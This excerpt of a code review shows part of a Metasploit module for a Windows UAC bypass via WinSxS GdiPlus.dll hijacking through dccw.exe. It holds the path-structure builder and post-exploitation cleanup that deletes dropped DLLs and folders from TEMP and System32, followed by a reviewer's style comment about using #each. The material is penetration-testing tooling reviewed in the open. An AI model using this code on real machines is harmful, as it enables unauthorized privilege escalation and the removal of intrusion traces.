modules/exploits/windows/local/bypassuac_injection_winsxs.rb

```diff
@@ -0,0 +1,389 @@
+  def create_struct(paths)
+
+    # write each path to the structure in the order they
+    # are defined in the bypass uac binary.
+    struct = ''
+    struct << fill_struct_path(paths[:szElevDir])
+    struct << fill_struct_path(paths[:szElevDirSysWow64])
+    struct << fill_struct_path(paths[:szElevDll])
+    struct << fill_struct_path(paths[:szElevDllFull])
+    struct << fill_struct_path(paths[:szElevExeFull])
+    struct << fill_struct_path(paths[:szTempDllPath])
+
+    struct
+  end
+
+  def fill_struct_path(path)
+    path = Rex::Text.to_unicode(path)
+    path + "\x00" * (520 - path.length)
+  end
+
+  def on_new_session(session)
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+    end
+    remove_dropped_elements(session)
+  end
+
+  # Remove all the created and dropped files and folders
+  def remove_dropped_elements(session)
+    droppedElements = []
+    successfullyRemoved = true
+
+    env_vars = get_envs('TEMP', 'WINDIR')
+    payload_filepath = "#{env_vars['TEMP']}\\dccw.exe.Local"
+
+    sysarch = sysinfo['Architecture']
+    if sysarch == ARCH_X86
+      targetedDirectories = "C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_*"
+    else
+      targetedDirectories = "C:\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_*"
+    end
+
+    directoryNames = get_directories(payload_filepath, targetedDirectories)
+    file_paths = get_file_paths(env_vars['WINDIR'], payload_filepath)
+
+    # Remove "GdiPlus.dll" from "C:\%TEMP%\dccw.exe.Local\*_microsoft.windows.gdiplus_*\"
+    # and "C:\Windows\System32\dccw.exe.Local\*_microsoft.windows.gdiplus_*\"
+    for i in 0 .. directoryNames.size - 1
+      directoryName = directoryNames[i].split("\\").last
+
+      droppedElements.push("#{directoryNames[i]}\\GdiPlus.dll")
+      session.fs.file.rm("#{directoryNames[i]}\\GdiPlus.dll") rescue nil
+      droppedElements.push("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll")
+      session.fs.file.rm("#{file_paths[:szElevDllFull]}\\#{directoryName}\\GdiPlus.dll") rescue nil
+    end
+
+    # Remove folders from "C:\%TEMP%\dccw.exe.Local\" and "C:\Windows\System32\dccw.exe.Local\"
+    for i in 0 .. directoryNames.size - 1
+      directoryName = directoryNames[i].split("\\").last
+
+      droppedElements.push(directoryNames[i])
+      session.fs.dir.rmdir(directoryNames[i]) rescue nil
+      droppedElements.push("#{file_paths[:szElevDllFull]}\\#{directoryName}")
+      session.fs.dir.rmdir("#{file_paths[:szElevDllFull]}\\#{directoryName}") rescue nil
+    end
+
+    # Remove "C:\Windows\System32\dccw.exe.Local" folder
+    droppedElements.push(file_paths[:szTempDllPath])
+    session.fs.dir.rmdir(file_paths[:szTempDllPath]) rescue nil
+    droppedElements.push(file_paths[:szElevDllFull])
+    session.fs.dir.rmdir(file_paths[:szElevDllFull]) rescue nil
+
+    # Check if have been successfully removed
+    for i in 0 .. droppedElements.size - 1
```

Comment:
can be replaced by calling #each on droppedElements
https://ruby-doc.org/core-2.2.0/Array.html#method-i-each